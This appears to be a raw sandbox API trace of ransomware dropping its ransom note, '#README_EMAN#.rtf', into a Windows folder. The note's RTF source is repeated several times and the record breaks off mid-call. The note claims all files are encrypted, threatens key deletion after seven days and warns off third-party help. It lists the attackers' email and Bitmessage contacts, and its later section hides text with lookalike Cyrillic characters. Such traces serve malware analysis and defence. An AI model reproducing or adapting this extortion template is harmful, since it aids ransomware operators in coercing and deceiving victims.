\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.077] WriteFile (in: hFile=0x2c8, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.077] CloseHandle (hObject=0x2c8) returned 1 [0269.077] GetFileAttributesW (lpFileName="C:\\ProgramData\\USOShared\\Logs\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\usoshared\\logs\\#readme_eman#.rtf")) returned 0xffffffff [0269.077] GetLastError () returned 0x2 [0269.077] CreateFileW (lpFileName="C:\\ProgramData\\USOShared\\Logs\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\usoshared\\logs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0269.078] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.078] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.078] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 